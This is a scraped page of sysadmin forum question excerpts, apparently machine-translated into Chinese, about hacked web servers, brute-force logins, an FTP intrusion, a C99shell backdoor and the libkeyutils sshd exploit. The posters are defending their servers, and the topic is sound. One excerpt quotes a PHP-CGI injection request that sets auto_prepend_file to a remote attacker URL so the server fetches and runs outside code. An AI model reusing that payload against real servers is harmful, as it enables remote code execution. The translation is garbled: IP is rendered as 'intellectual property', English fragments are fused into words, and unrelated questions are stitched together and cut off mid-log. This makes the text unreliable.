我们的服务器被黑了,几个页面被replace。 我们设法清理一切。 目前,如果您从任何地方使用任何浏览器访问网站,该网站显示正确和干净。 只有在一个特定的大学networking中,每台电脑(任何浏览器)都会不断显示被黑网站。 我们尝试了很多东西,非常尴尬: 没有涉及代理(与whatismyproxy.com检查透明代理) 如果您将服务器上的网站从index.php重命名为index2.php,则该文件将正确显示。 在浏览器上刷新页面将始终作为具有正确答案200的请求出现在apache日志中,但是由于在浏览器中旧页面将显示,所以在某处被截取。 我们甚至尝试使用wget,结果相同,旧的页面被下载。 我们不知道在哪里再看。 我们怎么能发现旧的页面caching? 非常感谢。
我有一个情况,来自摩尔多瓦的一些知识产权每天都会发现我的基本身份validation凭借某种types的蛮力攻击。 但是我有一个规则fail2ban应该避免这种情况。 当我尝试使用VPN时,它会起作用。 三次尝试后触发fail2ban的请求示例。 我的要求 2016/07/14 15:10:54 [error] 13937#0: *55700 user "engineer" was not found in "/usr/local/nginx/.htpasswd", client: 146.185.31.214, server: localhost, request: "GET / HTTP/1.1", host: "www.mysite.pt" 问题是,来自黑客IP的请求不会触发fail2ban,我不知道为什么。 唯一的区别是referrer:你可以看到。 2016/07/14 01:54:31 [error] 13913#0: *42558 user "engineer" was not found in "/usr/local/nginx/.htpasswd", client: 194.28.112.51, server: localhost, request: "GET / HTTP/1.1", host: "www.mysite.pt", referrer: "http://www.mysite.pt/ /etc/fail2ban/filter.d/nginx-http-auth.conf [Definition] […]
我们正在亚马逊主办几个虚拟机。 安全组和其他configuration设置为只允许从所需的地址和所需的各方进行访问。 机器确实互相交谈。 我关心的是通信安全。 我试图在网上search,但可能是我缺less正确的关键字,因为我找不到相关的信息。 如果包含敏感数据,我们是否需要encryption虚拟机之间的stream量? 有人可以用wireshark或类似的工具,检查我的stream量。 亚马逊如何防止托pipe虚拟机的人使用wireshark观察stream量?
我最近有一个FTP攻击,其中3个文件被复制到我的域的公共HTML目录。 (看起来FTP密码已经被盗用了,但是我仍然在研究这个)。奇怪的是,FTP日志logging了5个独立的IP地址,这些IP地址在同一次攻击中涉及到。 我检查了下面日志摘录中显示的IP。 据http://www.all-nettools.com/toolbox/smart-whois.php知识产权起源于奥地利,波兰,巴西,以色列和瑞典。 3个违规文件是“mickey66.html”,“mickey66.jpg”和“canopy37.html”, – 他们可以看到他们在日志额外… 2010-06-17T21:24:02.073070 + 01:00 webserver pure-ftpd:([email protected])[INFO] kingdom现在登入 2010-06-17T21:24:06.632472 + 01:00 webserver pure-ftpd:([email protected])[INFO] kingdom现在登入 webmaster pure-ftpd 🙁 [email protected])[公告] /home/kingdom//public_html/mickey66.html上传(80字节,0.26KB /秒) 2010-06-17T21:24:07.364313 + 01:00 webserver pure-ftpd 🙁 [email protected])[INFO]注销。 2010-06-17T21:24:08.711231 + 01:00 webserver pure-ftpd:([email protected])[INFO] kingdom现在登入 2010-06-17T21:24:10.720315 + 01:00 webserver pure-ftpd 🙁 [email protected])[NOTICE] /home/kingdom//public_html/mickey66.jpg上传(40835字节,35.90KB /秒) 2010-06-17T21:24:10.848782 + 01:00 webserver pure-ftpd 🙁 [email protected])[INFO]注销。 2010-06-17T21:24:18.528074 […]
我在我的服务器上发现了一个未经授权的文件,在将其下载到我的电脑后,我的杀毒软件将其识别为病毒Backdoor:PHP/C99shell.I 任何人都可以请指导我如何跟踪黑客和安全我的服务器? 谢谢。
今天我收到了不同IP的一些漏洞攻击。 GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt info3.txt的内容是: Google在过去的几天里正在展示一大堆人在谈论这个问题,但没有真正的解决scheme或解释。 有一个写在: http : //huguesjohnson.com/programming/hacking-attempt/ “我认为这是我现在要离开的地方,我不知道这个网站是否属于犯罪集团的一部分,但是因为它可以访问僵尸networking,所以我认为它是81.17.24.82 IP没有出现任何恶意软件经销商的地方,也许这是一个最近被攻破的networking服务器,或者是最近被组织这次攻击的一个IP地址。 我的问题是:这种情况下的下一步是什么? pipe理员应该遵循以通知安全人员的最佳做法是什么? 你遵循哪些网站来保持这样的事情,并应用适当的安全措施(如mod_security)?
mv /lib64/libkeyutils.so.1.9 /root service sshd restart Stopping sshd: [ OK ] Starting sshd: /usr/sbin/sshd: error while loading shared libraries: libkeyutils.so.1: cannot open shared object file: No such file or directory [FAILED] 我如何从SSHD中删除它? 需要解决这个问题: http : //www.webhostingtalk.com/showpost.php? p=8548338&postcount =4 现在我已经听说了关于这个漏洞的REF: http : //blog.solidshellsecurity.com/2013/02/18/0day-linuxcentos-sshd-spam-exploit-libkeyutils-so-1-9/ 他们不是用rootlogin的,他们甚至不会产生一个bash进程。 如果lib被移出,并且sshd被重新启动,他们将不能再loginfwiw。 关键在于了解他们是如何进入的。在非标准端口上完全升级,ssh密钥受限制的sshd正在受到攻击。 我的客户都不是,但我已经得到了很多关于这个问题的销售询问,所以我不知道机器的全部历史。 [/lib64]# rpm -vV openssh ……… /etc/ssh ……… c /etc/ssh/moduli […]
我正在考虑在网站上放置一个网站,这个网站可能成为黑客或主机雇员的一个有吸引力的目标,他们可以改变网站的代码,以利于他们的利益。 不希望自我托pipe,我正在考虑SSH到主机,上传一个MD5的可执行文件,并确保在网站的代码md5是预期的。 但是,当然,代码可以在我的扫描之间进行修改和恢复。 我可以通过SSH自动化md5,所以修改的窗口大大缩小,但理想情况下,我希望每次访问者使用该代码时都要使用md5'd,如果发生篡改,则禁止向访问者提供的信息。 我不能把这样一个完整性检查在网上的代码,因为它可能被黑掉。 另外,我在一个安全的shell中看到的代码与提供给访问者的代码是一样的。 执行前是否有任何可识别的远程代码完整性检查方法? 我在代码签名上读到的所有信息往往是在部署或下载过程中。
这是我以前的文章的重写,因为它不完全清楚我想达到什么。 希望这会更有意义:) 简而言之,我正在寻找的是替代方法来检测我的系统是否被超越使用诸如tripwire / OSSEC / samhain / rkhunter之类的工具而受到损害,并且只是一般的文件完整性检查和日志监视。 我故意试图不要对我的问题过于具体,因为我总是在想法之后,所以我可以在自己的机器上实现它们。 这可能是但不限于以设定的时间间隔(cronjob)运行的脚本,并且在某些事情发生变化时通知pipe理员并提示pipe理员通过(syslog / email?)进一步调查。 注意,我不一定是在代码本身之后,只是对它所做的高级概述。 随意如你所愿,尽可能详细。 如果我列出一些我目前所做的事情,可以帮助您了解我的想法。 1)生成我运行的iptables输出的md5sum,并将其与已知的好散列进行比较。 如果更改,则可以安全地假设有人添加/删除了iptables条目。 2)我有某些只读(/ usr,/ boot等)的挂载点,因为它们不应该经常改变。 如果一个分区从只读变为可写,我希望得到通知。 3)只监听netstat的输出。 对包含已知良好值的文件执行文件比较(diff)。 如果添加了某些东西,可能有人已经为系统添加了新的服务。 可能的后门? 请注意,如果我正在进行系统维护,上述操作将产生误报。 但是,如果这些变化,当我不是我会考虑他们的怀疑和进一步调查。 请注意,这些仅仅是一些例子,并且确实存在一些缺陷,但是更多的障碍可能会导致有人绊倒。 提前致谢。
我怎么能欺骗SBS 2011让我分配一个UPN别名,以便用户可以login为[email protected] 请参阅http://support.microsoft.com/kb/243629/en-us 但在SBS上,我只有一个'General','Trusts'和'Managed by'选项卡。这是SBS 2011。